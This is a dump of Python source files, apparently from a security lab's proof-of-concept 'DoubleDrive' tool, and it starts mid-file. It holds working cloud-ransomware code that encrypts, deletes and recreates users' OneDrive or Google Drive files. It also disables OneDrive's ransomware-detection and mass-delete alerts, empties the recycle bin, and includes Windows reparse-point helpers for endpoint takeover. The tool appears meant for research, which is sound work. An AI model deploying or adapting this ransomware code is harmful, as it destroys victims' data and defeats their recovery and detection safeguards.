212 | 213 | :param onedrive_item_id_list: A list of the items to delete 214 | """ 215 | headers = { 216 | "AppId": "1276168582", 217 | "ClientAppId": "1276168582", 218 | "Platform": "Android Emulator", 219 | "Version": "6.74", 220 | "User-Agent": "okhttp/4.9.3", 221 | "Accept": "application/json", 222 | "Accept-Encoding": "gzip", 223 | } 224 | 225 | params = { 226 | "cid": self.get_drive_id(), 227 | "deletionType": 3, 228 | "items": onedrive_item_id_list 229 | } 230 | 231 | res = self.__safe_http_request("POST", f"https://skyapi.live.net/API/2/DeleteItems", headers=headers, json=params) 232 | 233 | def empty_recycle_bin(self): 234 | """ 235 | Empties the recycle bin 236 | """ 237 | headers = { 238 | "AppId": "1276168582", 239 | "ClientAppId": "1276168582", 240 | "Platform": "Android Emulator", 241 | "Version": "6.74", 242 | "User-Agent": "okhttp/4.9.3", 243 | "Accept": "application/json", 244 | "Accept-Encoding": "gzip", 245 | } 246 | 247 | res = self.__safe_http_request("POST", f"https://skyapi.live.net/API/2/DeleteAll", headers=headers) 248 | 249 | def get_drive_id(self): 250 | """ 251 | Returns the ID that identifies the drive of the OneDrive cloud storage 252 | """ 253 | if None != self.__drive_id: 254 | return self.__drive_id 255 | 256 | res = self.__safe_http_request("GET", "https://api.onedrive.com/v1.0/drives/me") 257 | self.__drive_id = res.json()["id"] 258 | 259 | return self.__drive_id 260 | 261 | def get_item_by_path(self, item_path: str) -> OneDriveItem: 262 | """ 263 | Returns an item by its path on the cloud storage. 
264 | 265 | :param item_path: The item's path 266 | :raises RuntimeError: If the given path was not found 267 | """ 268 | if "/" != item_path: 269 | onedrive_parent_item = self.get_item_by_path(os.path.dirname(item_path)) 270 | path_parent_children = self.list_children(onedrive_parent_item) 271 | path_basename = os.path.basename(item_path) 272 | for child_onedrive_item in path_parent_children: 273 | if path_basename == child_onedrive_item.name: 274 | return child_onedrive_item 275 | raise RuntimeError("Could not find OneDrive item") 276 | else: 277 | return self.get_root_folder_item() 278 | 279 | def read_shared_file_content(self, onedrive_drive_id: str, onedrive_item_id: str, auth_key: str) -> bytes: 280 | """ 281 | Reads the content of a shared file by its ID, the ID of its OneDrive drive and using 282 | an authentication key that was issued specifically for the purpose of the share. 283 | 284 | The parameters of this call can all be extracted from an email that was sent as a result 285 | of sharing a file with OneDrive. 286 | 287 | Note - You do not have to be logged in in order to use this function. 
288 | 289 | :param onedrive_drive_id: The ID of the OneDrive drive where that shared file is located 290 | :param onedrive_item_id: The ID of the shared file 291 | :param auth_key: The authentication key that was issued for the purpose of the share 292 | :return: The content of the shared file 293 | """ 294 | req_data = { 295 | "select": "id,@content.downloadUrl", 296 | "authkey": auth_key, 297 | } 298 | 299 | res = self.__safe_http_request("GET", f"https://api.onedrive.com/v1.0/drives/{onedrive_drive_id}/items/{onedrive_item_id}", params=req_data) 300 | res = self.__safe_http_request("GET", res.json()["@content.downloadUrl"]) 301 | return res.content 302 | 303 | def read_file_content(self, onedrive_item: OneDriveFileItem) -> bytes: 304 | """ 305 | Read the content of a file in OneDrive 306 | 307 | :param onedrive_item: The file to read 308 | :return: The content of the file 309 | """ 310 | req_data = {"select": "@content.downloadUrl"} 311 | 312 | res = self.__safe_http_request("GET", f"https://api.onedrive.com/v1.0/drives/me/items/{onedrive_item.id}", json=req_data) 313 | res = self.__safe_http_request("GET", res.json()["@content.downloadUrl"]) 314 | return res.content 315 | 316 | def create_file(self, onedrive_file_path: str, file_content: bytes, modify_if_exists: bool = False) -> OneDriveFileItem: 317 | """ 318 | Creates a file in OneDrive. 319 | 320 | :param onedrive_file_path: The path for the new file. 
321 | :param file_content: The content of the new file 322 | :param modify_if_exists: True if this function should modify the path of the given file in case it already exists, defaults to False 323 | :return: The new file 324 | """ 325 | conflict_behavior = "replace" if modify_if_exists else "fail" 326 | req_data = {"item":{"@name.conflictBehavior":conflict_behavior}} 327 | upload_response = self.__upload_file_content(onedrive_file_path, file_content, req_data) 328 | upload_response_json = upload_response.json() 329 | return self.__item_json_to_onedrive_item(upload_response_json) 330 | 331 | def modify_file_content(self, onedrive_item: OneDriveFileItem, new_content: bytes): 332 | """ 333 | Modifies a file content in OneDrive. 334 | 335 | :param onedrive_item: The file to modify 336 | :param new_content: The new content to overwrite the file with 337 | """ 338 | req_data = {"item":{"@name.conflictBehavior":"replace"}} 339 | self.__upload_file_content(onedrive_item.full_path, new_content, req_data) 340 | 341 | def delete_item(self, onedrive_item: OneDriveItem): 342 | """ 343 | Deletes an item in OneDrive. 344 | 345 | :param onedrive_item: The item to delete 346 | """ 347 | self.__delete_item_by_id(onedrive_item.id) 348 | 349 | def get_root_folder_item(self) -> OneDriveFolderItem: 350 | """ 351 | Returns the root folder in OneDrive. 352 | """ 353 | return OneDriveFolderItem("/", None, "root") 354 | 355 | def list_children(self, onedrive_folder: OneDriveFolderItem) -> list[OneDriveItem]: 356 | """ 357 | Lists all the direct children of a folder in OneDrive (only at the first level). 
358 | 359 | :param onedrive_folder: The folder to list 360 | :return: A list containing all the children of the given folder 361 | """ 362 | req_params = { 363 | "$top": 100, 364 | "$select": "*,ocr,webDavUrl,sharepointIds,isRestricted,commentSettings,specialFolder" 365 | } 366 | 367 | children_list = [] 368 | next_page_request_url = f"https://api.onedrive.com/v1.0/drives/me/items/{onedrive_folder.id}/children" 369 | while next_page_request_url: 370 | res = self.__safe_http_request("GET", next_page_request_url, json=req_params) 371 | res_json = res.json() 372 | res_children_list = res_json["value"] 373 | next_page_request_url = res_json.get("@odata.nextLink", None) 374 | 375 | for child_element in res_children_list: 376 | onedrive_item = self.__item_json_to_onedrive_item(child_element) 377 | children_list.append(onedrive_item) 378 | 379 | return children_list 380 | 381 | 382 | def list_children_recursively(self, onedrive_folder_item: OneDriveFolderItem) -> list[OneDriveItem]: 383 | """ 384 | Lists all the children of a folder in OneDrive recursively (at all levels) 385 | 386 | :param onedrive_folder_item: The folder to list 387 | :return: A list of all the folder's children 388 | """ 389 | all_children_items = [] 390 | first_level_children = self.list_children(onedrive_folder_item) 391 | 392 | all_children_items.extend(first_level_children) 393 | for onedrive_child_item in first_level_children: 394 | if isinstance(onedrive_child_item, OneDriveFolderItem): 395 | all_children_items.extend(self.list_children_recursively(onedrive_child_item)) 396 | 397 | return all_children_items 398 | 399 | -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/onedrive/onedrive_item.py: -------------------------------------------------------------------------------- 1 | from dataclasses import dataclass 2 | 3 | from doubledrive.cloud_drive.cloud_drive import CloudDriveItem, CloudDriveFolderItem, CloudDriveFileItem 4 | 5 | 
@dataclass 6 | class OneDriveItem(CloudDriveItem): 7 | """ 8 | A general item that is stored on OneDrive storage 9 | """ 10 | id: str 11 | 12 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 13 | super().__init__(full_path) 14 | self.id = id 15 | self.parent_id = parent_id 16 | 17 | @dataclass 18 | class OneDriveFolderItem(OneDriveItem, CloudDriveFolderItem): 19 | """ 20 | A folder that is stored on OneDrive storage 21 | """ 22 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 23 | OneDriveItem.__init__(self, full_path, parent_id, id) 24 | 25 | @dataclass 26 | class OneDriveFileItem(OneDriveItem, CloudDriveFileItem): 27 | """ 28 | A file that is stored on OneDrive storage 29 | """ 30 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 31 | OneDriveItem.__init__(self, full_path, parent_id, id) 32 | 33 | @dataclass 34 | class OneDrivePackageItem(OneDriveItem, CloudDriveFileItem): 35 | """ 36 | A 'package' file that is stored on OneDrive storage. That is a file that 37 | OneDrive has a more advanced support for on the web OneDrive version. 38 | Files such as Word documents, PowerPoint slides, OneNote documents, etc.. 
39 | """ 40 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 41 | OneDriveItem.__init__(self, full_path, parent_id, id) 42 | -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_ransomware/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/cloud_drive_ransomware.py: -------------------------------------------------------------------------------- 1 | import os 2 | import uuid 3 | from cryptography.fernet import Fernet 4 | 5 | from doubledrive.cloud_drive.cloud_drive import * 6 | 7 | class CloudDriveRansomware: 8 | """ 9 | A base class for classes that implement a ransomware for a cloud storage service 10 | """ 11 | 12 | def __init__(self, logged_in_cloud_drive: ICloudDriveSession, save_key_path: str): 13 | """ 14 | Creates a CloudDriveRansomware 15 | 16 | :param logged_in_cloud_drive: An instance of a session with a cloud storage service that is already logged in 17 | :param save_key_path: Path to save the Fernet encryption/decryption key 18 | """ 19 | self._cloud_drive = logged_in_cloud_drive 20 | self.__save_key_path = save_key_path 21 | self.__key = None 22 | 23 | @abstractmethod 24 | def _first_stage_overwriting_finished_callback(self, paths_to_encrypted_contents: dict[str, bytes]): 25 | """ 26 | Callback for when the first stage of overwriting target files with their encrypted contents is done. 27 | Does not happen if quick_delete mode was set. 
28 | 29 | :param paths_to_encrypted_contents: A dict that maps paths that were encrypted to their encrypted contents 30 | """ 31 | pass 32 | 33 | @abstractmethod 34 | def _second_stage_deletion_finished_callback(self, paths_to_encrypted_contents: dict[str, bytes]): 35 | """ 36 | Callback for when the second stage of deleting all target files is done. 37 | 38 | :param paths_to_encrypted_contents: A dict that maps paths that were encrypted to their encrypted contents 39 | """ 40 | pass 41 | 42 | @abstractmethod 43 | def _third_stage_recreation_finished_callback(self, paths_to_encrypted_contents: dict[str, bytes]): 44 | """ 45 | Callback for when the third stage of restoring all encrypted files to their original location is done. 46 | 47 | :param paths_to_encrypted_contents: A dict that maps paths that were encrypted to their encrypted contents 48 | """ 49 | pass 50 | 51 | def start_ransomware(self, target_cloud_file_items: list[CloudDriveFileItem], quick_delete: bool = False, file_extension: str = ".encrypted"): 52 | """ 53 | Starts the ransomware action. This ransomware implementation works in three stages: 54 | * Encrypt all target files (can be skipped with quick_delete mode) 55 | * Delete all target files 56 | * Restore all target file 57 | 58 | The deletion step is very likely to be needed when a cloud ransomware is run because many different cloud services has recovery 59 | features for files. Most services will have at least previous versions of Microsoft Office files. Thus, the best way to deal with 60 | that is to delete these files and restore them back to their original paths with the new encrypted contents. 61 | 62 | The first stage of encrypting and overwriting the files can be skipped. However, this stage ensures that the files are overwritten 63 | on the disk itself and cannot later be restored from an MFT entries marked as free. 
The attacker can also ensure that with another 64 | way which is creating a huge file on the disk and fill the disk completely and by that ensuring that all free space on the disk is 65 | overwritten and there is nothing to restore. 66 | 67 | Note - Every time this function run it generates a new Fernet symmetric encryption/decryption key to encrypt files with. The Fernet 68 | symmetric encryption is used just for PoC and convinience purposes. You are welcome to modify the code to change any other encryption 69 | method you prefer. 70 | 71 | :param target_cloud_file_items: A list of the target files to encrypt 72 | :param quick_delete: Whether the first stage of encrypting and overwriting the files should be skipped the file, defaults to False 73 | :param file_extension: ransomware file extension to add to the encrypted files, defaults to ".encrypted" 74 | """ 75 | self.__generate_key() 76 | self.__save_key() 77 | paths_to_encrypted_contents = self.__create_encrypted_contents_from_cloud_files(target_cloud_file_items) 78 | 79 | if not quick_delete: 80 | for cloud_file_path, file_encrypted_content in paths_to_encrypted_contents.items(): 81 | cloud_drive_item = self._cloud_drive.get_item_by_path(cloud_file_path) 82 | print(f"Modifying file: {cloud_file_path}") 83 | self._cloud_drive.modify_file_content(cloud_drive_item, file_encrypted_content) 84 | self._first_stage_overwriting_finished_callback(paths_to_encrypted_contents) 85 | 86 | for cloud_file in target_cloud_file_items: 87 | print(f"Deleting file: {cloud_file.full_path}") 88 | self._cloud_drive.delete_item(cloud_file) 89 | self._second_stage_deletion_finished_callback(paths_to_encrypted_contents) 90 | 91 | for cloud_file_path, new_file_content in paths_to_encrypted_contents.items(): 92 | print(f"Creating file with encrypted contents: {cloud_file_path}{file_extension}") 93 | self._cloud_drive.create_file(f"{cloud_file_path}{file_extension}", new_file_content) 94 | 
self._third_stage_recreation_finished_callback(paths_to_encrypted_contents) 95 | 96 | 97 | def __save_key(self): 98 | """ 99 | Saves the Fernet encryption/decryption key to the path given in the constructor. 100 | """ 101 | with open(self.__save_key_path, "wb") as f: 102 | f.write(self.__key) 103 | 104 | def __generate_key(self): 105 | """ 106 | Generates the Fernet symmetric encryption key 107 | """ 108 | self.__key = Fernet.generate_key() 109 | 110 | def __encrypt_data(self, file_content: bytes) -> bytes: 111 | """ 112 | Encrypts a bytes buffer using the previously generated Fernet symmetric key 113 | 114 | :param file_content: data to encrypt 115 | :return: The encrypted data 116 | """ 117 | return Fernet(self.__key).encrypt(file_content) 118 | 119 | def __create_encrypted_contents_from_cloud_files(self, target_cloud_file_items: list[CloudDriveFileItem]) -> dict[str, bytes]: 120 | """ 121 | Creates a dictionary mapping of paths of files to encrypt on the cloud storage to their new encrypted contents. 122 | 123 | :param target_cloud_file_items: A list of the files to encrypt. 
124 | :return: The created mapping dictionary 125 | """ 126 | paths_to_encrypted_contents = {} 127 | for cloud_file_item in target_cloud_file_items: 128 | print(f"Generating encrypted contents for file: {cloud_file_item.full_path}") 129 | file_content = self._cloud_drive.read_file_content(cloud_file_item) 130 | file_new_content = self.__encrypt_data(file_content) 131 | paths_to_encrypted_contents[cloud_file_item.full_path] = file_new_content 132 | 133 | return paths_to_encrypted_contents -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/google_drive_ransomware.py: -------------------------------------------------------------------------------- 1 | import time 2 | 3 | from doubledrive.cloud_drive.google_drive.google_drive import GoogleDrive 4 | from doubledrive.cloud_ransomware.cloud_drive_ransomware import CloudDriveRansomware 5 | 6 | class GoogleDriveRansomware(CloudDriveRansomware): 7 | 8 | def __init__(self, logged_in_cloud_drive: GoogleDrive, save_key_dir_path: str,): 9 | super().__init__(logged_in_cloud_drive, save_key_dir_path) 10 | 11 | def _first_stage_overwriting_finished_callback(self, paths_to_encrypted_contents): 12 | pass 13 | 14 | def _second_stage_deletion_finished_callback(self, paths_to_encrypted_contents): 15 | # No need to empty the trash bin because the delete_item function in GoogleDrive deletes files permanently 16 | pass 17 | 18 | def _third_stage_recreation_finished_callback(self, paths_to_encrypted_contents): 19 | pass -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/onedrive_ransomware.py: -------------------------------------------------------------------------------- 1 | import time 2 | 3 | from doubledrive.cloud_drive.onedrive.onedrive import OneDrive 4 | from doubledrive.cloud_ransomware.cloud_drive_ransomware import CloudDriveRansomware 5 | 6 | class OneDriveRansomware(CloudDriveRansomware): 7 | 8 | def 
__init__(self, logged_in_cloud_drive: OneDrive, save_key_path: str, first_stage_done_delay = 10, second_stage_done_delay = 10): 9 | super().__init__(logged_in_cloud_drive, save_key_path) 10 | self.__first_stage_done_delay = first_stage_done_delay 11 | self.__second_stage_done_delay = second_stage_done_delay 12 | self._cloud_drive.patch_user_preferences({"RansomwareDetection": False, "MassDelete": False}) 13 | 14 | def _first_stage_overwriting_finished_callback(self, paths_to_encrypted_contents): 15 | time.sleep(self.__first_stage_done_delay) 16 | 17 | def _second_stage_deletion_finished_callback(self, paths_to_encrypted_contents): 18 | time.sleep(self.__second_stage_done_delay) 19 | self._cloud_drive.empty_recycle_bin() 20 | 21 | def _third_stage_recreation_finished_callback(self, paths_to_encrypted_contents): 22 | pass -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/endpoint_info/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/endpoint_info/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/endpoint_info/onedrive/__init__.py: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/endpoint_info/onedrive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/endpoint_info/onedrive/onedrive_info.py: -------------------------------------------------------------------------------- 1 | import winreg 2 | import os 3 | 4 | class OneDriveInfo: 5 | ONEDRIVE_PER_USER_FOLDER = os.path.expandvars(r"%localappdata%\Microsoft\OneDrive") 6 | PERSONAL_ODL_FOLDER = os.path.join(ONEDRIVE_PER_USER_FOLDER, "logs\\Personal") 7 | 8 | def __init__(self) -> None: 9 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 10 | 11 | with winreg.OpenKey(hkcu_key, "Software\\Microsoft\\OneDrive\\Accounts\\Personal") as onedrive_personal_reg_key: 12 | self.sync_folder = winreg.QueryValueEx(onedrive_personal_reg_key, "UserFolder")[0] 13 | 14 | with winreg.OpenKey(hkcu_key, "Software\\Microsoft\\OneDrive") as onedrive_reg_key: 15 | self.main_exe_path = winreg.QueryValueEx(onedrive_reg_key, "OneDriveTrigger")[0] 16 | onedrive_version = winreg.QueryValueEx(onedrive_reg_key, "Version")[0] 17 | 18 | self.program_folder = os.path.dirname(self.main_exe_path) 19 | self.version_installation_folder = os.path.join(self.program_folder, onedrive_version) 20 | 21 | 22 | g_onedrive_info_single_instance = None 23 | def get_onedrive_info(): 24 | global g_onedrive_info_single_instance 25 | if None == g_onedrive_info_single_instance: 26 | g_onedrive_info_single_instance = OneDriveInfo() 27 | return g_onedrive_info_single_instance -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/reparse_points/__init__.py: -------------------------------------------------------------------------------- 
IO_REPARSE_TAG_SYMLINK = 0xA000000C
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003
# Byte length of the REPARSE_DATA_BUFFER fields that precede the type-specific union.
REPARSE_DATA_BUFFER_HEADER_LENGTH = getattr(REPARSE_DATA_BUFFER, "GenericReparseBuffer").offset


def nt_path(path: str) -> str:
    """Prefixes a path with the NT namespace prefix ("\\??\\") unless already present."""
    if path.startswith("\\??"):
        return path
    return f"\\??\\{path}"


def create_symlink_reparse_buffer(target_path: str, print_name: str, relative: bool) -> bytes:
    """Builds the raw REPARSE_DATA_BUFFER bytes for an NTFS symbolic link.

    :param target_path: Path the symlink points at; converted to an NT path unless relative
    :param print_name: Human-readable name stored alongside the substitute name
    :param relative: Whether the symlink target is relative (sets the SYMLINK_FLAG_RELATIVE flag)

    :return: Serialized reparse buffer, ready for FSCTL_SET_REPARSE_POINT
    """
    if not relative:
        target_path = nt_path(target_path)
    unicode_target_path = ctypes.create_unicode_buffer(target_path)
    unicode_target_path_byte_size = (len(unicode_target_path) - 1) * 2  # remove null terminator from size
    unicode_print_name = ctypes.create_unicode_buffer(print_name)
    unicode_print_name_byte_size = (len(unicode_print_name) - 1) * 2  # remove null terminator from size

    # 12 == size of the SYMBOLIC_LINK_REPARSE_BUFFER fields before PathBuffer
    # (4 USHORTs + 1 ULONG), 4 == the two UTF-16 NUL terminators.
    path_buffer_byte_size = unicode_target_path_byte_size + unicode_print_name_byte_size + 12 + 4
    total_size = path_buffer_byte_size + REPARSE_DATA_BUFFER_HEADER_LENGTH

    # create_string_buffer() appends one NUL byte, hence total_size - 1.
    reparse_data_buffer = ctypes.create_string_buffer(b"\x00" * (total_size - 1))
    reparse_data_struct = ctypes.cast(reparse_data_buffer, ctypes.POINTER(REPARSE_DATA_BUFFER)).contents
    reparse_data_struct.ReparseTag = IO_REPARSE_TAG_SYMLINK
    reparse_data_struct.ReparseDataLength = path_buffer_byte_size

    reparse_data_struct.SymbolicLinkReparseBuffer.SubstituteNameOffset = 0
    reparse_data_struct.SymbolicLinkReparseBuffer.SubstituteNameLength = unicode_target_path_byte_size

    # Copy the substitute name (with its NUL terminator) into PathBuffer.
    path_buffer_address = ctypes.addressof(reparse_data_struct) + REPARSE_DATA_BUFFER_HEADER_LENGTH + getattr(SYMBOLIC_LINK_REPARSE_BUFFER, "PathBuffer").offset
    path_buffer_pointer = ctypes.cast(path_buffer_address, ctypes.POINTER(ctypes.c_byte))
    ctypes.memmove(path_buffer_pointer, unicode_target_path, unicode_target_path_byte_size + 2)

    reparse_data_struct.SymbolicLinkReparseBuffer.PrintNameOffset = unicode_target_path_byte_size + 2
    reparse_data_struct.SymbolicLinkReparseBuffer.PrintNameLength = unicode_print_name_byte_size

    # Print name follows the substitute name (and its NUL) inside PathBuffer.
    print_name_address = path_buffer_address + unicode_target_path_byte_size + 2
    print_name_pointer = ctypes.cast(print_name_address, ctypes.POINTER(ctypes.c_byte))
    ctypes.memmove(print_name_pointer, unicode_print_name, unicode_print_name_byte_size + 2)
    reparse_data_struct.SymbolicLinkReparseBuffer.Flags = 1 if relative else 0

    return bytes(reparse_data_buffer)


def create_mount_point_reparse_buffer(target_path: str, print_name: str, relative: bool) -> bytes:
    """Builds the raw REPARSE_DATA_BUFFER bytes for an NTFS mount point (junction).

    :param target_path: Path the junction points at; converted to an NT path unless relative
    :param print_name: Human-readable name stored alongside the substitute name
    :param relative: Whether target_path should be left as-is instead of NT-prefixed

    :return: Serialized reparse buffer, ready for FSCTL_SET_REPARSE_POINT
    """
    if not relative:
        target_path = nt_path(target_path)
    unicode_target_path = ctypes.create_unicode_buffer(target_path)
    unicode_target_path_byte_size = (len(unicode_target_path) - 1) * 2  # remove null terminator from size
    unicode_print_name = ctypes.create_unicode_buffer(print_name)
    unicode_print_name_byte_size = (len(unicode_print_name) - 1) * 2  # remove null terminator from size

    # 8 == size of the MOUNT_POINT_REPARSE_BUFFER fields before PathBuffer
    # (4 USHORTs), 4 == the two UTF-16 NUL terminators.
    path_buffer_byte_size = unicode_target_path_byte_size + unicode_print_name_byte_size + 8 + 4
    total_size = path_buffer_byte_size + REPARSE_DATA_BUFFER_HEADER_LENGTH

    # create_string_buffer() appends one NUL byte, hence total_size - 1.
    reparse_data_buffer = ctypes.create_string_buffer(b"\x00" * (total_size - 1))
    reparse_data_struct = ctypes.cast(reparse_data_buffer, ctypes.POINTER(REPARSE_DATA_BUFFER)).contents
    reparse_data_struct.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT
    reparse_data_struct.ReparseDataLength = path_buffer_byte_size

    reparse_data_struct.MountPointReparseBuffer.SubstituteNameOffset = 0
    reparse_data_struct.MountPointReparseBuffer.SubstituteNameLength = unicode_target_path_byte_size

    path_buffer_address = ctypes.addressof(reparse_data_struct) + REPARSE_DATA_BUFFER_HEADER_LENGTH + getattr(MOUNT_POINT_REPARSE_BUFFER, "PathBuffer").offset
    path_buffer_pointer = ctypes.cast(path_buffer_address, ctypes.POINTER(ctypes.c_byte))
    ctypes.memmove(path_buffer_pointer, unicode_target_path, unicode_target_path_byte_size + 2)

    reparse_data_struct.MountPointReparseBuffer.PrintNameOffset = unicode_target_path_byte_size + 2
    reparse_data_struct.MountPointReparseBuffer.PrintNameLength = unicode_print_name_byte_size

    print_name_address = path_buffer_address + unicode_target_path_byte_size + 2
    print_name_pointer = ctypes.cast(print_name_address, ctypes.POINTER(ctypes.c_byte))
    ctypes.memmove(print_name_pointer, unicode_print_name, unicode_print_name_byte_size + 2)

    return bytes(reparse_data_buffer)


def set_reparse_point(reparse_point_path, reparse_data_buffer, is_dir=False):
    """Creates the reparse-point placeholder (file or directory) and attaches the buffer.

    :param reparse_point_path: Path where the reparse point is created
    :param reparse_data_buffer: Serialized REPARSE_DATA_BUFFER bytes
    :param is_dir: Whether the reparse point should be a directory (required for mount points)
    """
    file_flags = win32file.FILE_FLAG_OPEN_REPARSE_POINT
    if is_dir:
        try:
            win32file.CreateDirectoryW(reparse_point_path, None)
        except pywintypes.error:
            pass  # Best effort: the directory may already exist.
        # Required to open a directory handle with CreateFile.
        file_flags |= win32file.FILE_FLAG_BACKUP_SEMANTICS
    else:
        open(reparse_point_path, "wb").close()

    reparse_point_handle = win32file.CreateFile(reparse_point_path, win32file.GENERIC_READ | win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, file_flags, 0)
    try:
        win32file.DeviceIoControl(reparse_point_handle, winioctlcon.FSCTL_SET_REPARSE_POINT, reparse_data_buffer, None, None)
    finally:
        # Fix: explicitly close the handle instead of leaking it until GC.
        reparse_point_handle.Close()


def create_ntfs_symlink(reparse_point_path, target_path, relative=False, print_name=None, is_dir=False):
    """Creates an NTFS symlink reparse point at reparse_point_path targeting target_path."""
    if print_name is None:
        print_name = target_path
    reparse_data_buffer = create_symlink_reparse_buffer(target_path, print_name, relative)
    set_reparse_point(reparse_point_path, reparse_data_buffer, is_dir)


def create_mount_point(reparse_point_path, target_path, relative=False, print_name=None):
    """Creates an NTFS mount point (junction) at reparse_point_path targeting target_path."""
    if print_name is None:
        print_name = target_path
    reparse_data_buffer = create_mount_point_reparse_buffer(target_path, print_name, relative)
    # Mount points are only valid on directories.
    set_reparse_point(reparse_point_path, reparse_data_buffer, True)
import random
import uuid
from dataclasses import dataclass


@dataclass
class EmailMessage:
    """A single message received by the temporary mailbox."""
    source_email: str
    subject: str
    content: str


class TempEmail:
    """Wraps the 1secmail.com disposable-email HTTP API."""

    def __init__(self, email_address: str = None) -> None:
        """Binds this object to a mailbox.

        :param email_address: Existing "user@domain" address to reuse; a new
            random address is generated when None.
        """
        self.domain = None
        self.username = None
        if email_address is None:
            self.generate_new_address()
        else:
            # Fix: split at the first "@" once instead of scanning for it twice.
            self.username, _, self.domain = email_address.partition("@")

    def generate_new_address(self):
        """Picks a random 1secmail domain and a random UUID-based username."""
        import requests  # Lazy import: only the network methods need it.

        res = requests.get("https://www.1secmail.com/api/v1/?action=getDomainList")
        self.domain = random.choice(res.json())
        # Fix: store the username as a str; uuid.uuid4() returned a UUID object,
        # inconsistent with the str username parsed from an existing address.
        self.username = str(uuid.uuid4())

    def get_messages(self) -> list[EmailMessage]:
        """Fetches every message currently in the mailbox.

        :return: List of EmailMessage objects with full bodies.
        """
        import requests  # Lazy import: only the network methods need it.

        res = requests.get(f"https://www.1secmail.com/api/v1/?action=getMessages&login={self.username}&domain={self.domain}")
        messages_json = res.json()

        result_messages = []
        for message_json in messages_json:
            # The list endpoint only returns metadata; fetch each full message.
            message_id = message_json["id"]
            res = requests.get(f"https://www.1secmail.com/api/v1/?action=readMessage&login={self.username}&domain={self.domain}&id={message_id}")
            full_message_json = res.json()
            new_message = EmailMessage(full_message_json["from"], full_message_json["subject"], full_message_json["body"])
            result_messages.append(new_message)

        return result_messages
import base64
import datetime
import glob
import gzip
import io
import json
import os
import re
import string
import struct
from datetime import date

from construct import *
from construct.core import Int32ul, Int64ul
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# All C0 and C1 control characters; the negated class below matches printable runs.
control_chars = "".join(map(chr, range(0, 32))) + "".join(map(chr, range(127, 160)))
not_control_char_re = re.compile(f"[^{control_chars}]" + "{4,}")
# If we only want ascii, use "ascii_chars_re" below
printable_chars_for_re = string.printable.replace("\\", "\\\\").replace("[", "\\[").replace("]", "\\]").encode()
ascii_chars_re = re.compile(b"[{" + printable_chars_for_re + b"}]" + b"{4,}")


def ReadUnixMsTime(unix_time_ms):  # Unix millisecond timestamp
    """Returns datetime object, or empty string upon error"""
    if unix_time_ms not in (0, None, ""):
        try:
            if isinstance(unix_time_ms, str):
                unix_time_ms = float(unix_time_ms)
            return datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=unix_time_ms / 1000)
        except (ValueError, OverflowError, TypeError):
            # Unparseable or out-of-range timestamp: fall through to "".
            pass
    return ""


# Per-record header of an ODL log entry.
CDEF = Struct(
    "signature" / Int64ul,  # CCDDEEFF00000000
    "timestamp" / Int64ul,
    "unk1" / Int32ul,
    "unk2" / Int32ul,
    "unknown" / Byte[20],
    "one" / Int32ul,  # 1
    "data_len" / Int32ul,
    "reserved" / Int32ul  # 0
    # followed by Data
)

# File header of an ODL log file.
Odl_header = Struct(
    "signature" / Int64ul,  # EBFGONED
    "unk_version" / Int32ul,
    "unknown_2" / Int32ul,
    "unknown_3" / Int64ul,
    "unknown_4" / Int32ul,
    "one_drive_version" / Byte[0x40],
    "windows_version" / Byte[0x40],
    "reserved" / Byte[0x64]
)


def read_string(data):
    """read string, return tuple (bytes_consumed, string)

    Strings are serialized as a little-endian uint32 length followed by that
    many UTF-8 bytes.
    """
    if len(data) >= 4:
        # Fix: reconstructed the unpack call that was garbled in this copy.
        str_len = struct.unpack("<I", data[0:4])[0]
        if 4 + str_len > len(data):
            print("Error in read_string()")
        else:
            return (4 + str_len, data[4:4 + str_len].decode("utf8", "ignore"))
    return (4, "")


def guess_encoding(obfuscation_map_path):
    """Returns either UTF8 or UTF16LE after checking the file"""
    encoding = "utf-16le"  # on windows this is the default
    with open(obfuscation_map_path, "rb") as f:
        data = f.read(4)
        if len(data) == 4:
            # ASCII text in UTF-16LE has NUL high bytes at odd offsets.
            if data[1] == 0 and data[3] == 0 and data[0] != 0 and data[2] != 0:
                pass  # confirmed utf-16le
            else:
                encoding = "utf8"
    return encoding
# UnObfuscation code
key = ""  # AES key from the ODL keystore; "" until read_keystore() succeeds
utf_type = "utf16"  # encoding of decrypted strings, detected by read_keystore()


def decrypt(cipher_text):
    """cipher_text is expected to be base64 encoded.

    Returns the decrypted string, or "" on any validation/decryption failure.
    """
    global key
    global utf_type

    if key == "":
        return ""  # keystore not loaded yet
    if len(cipher_text) < 22:
        return ""  # invalid
    # add proper base64 padding
    remainder = len(cipher_text) % 4
    if remainder == 1:
        return ""  # invalid b64
    elif remainder in (2, 3):
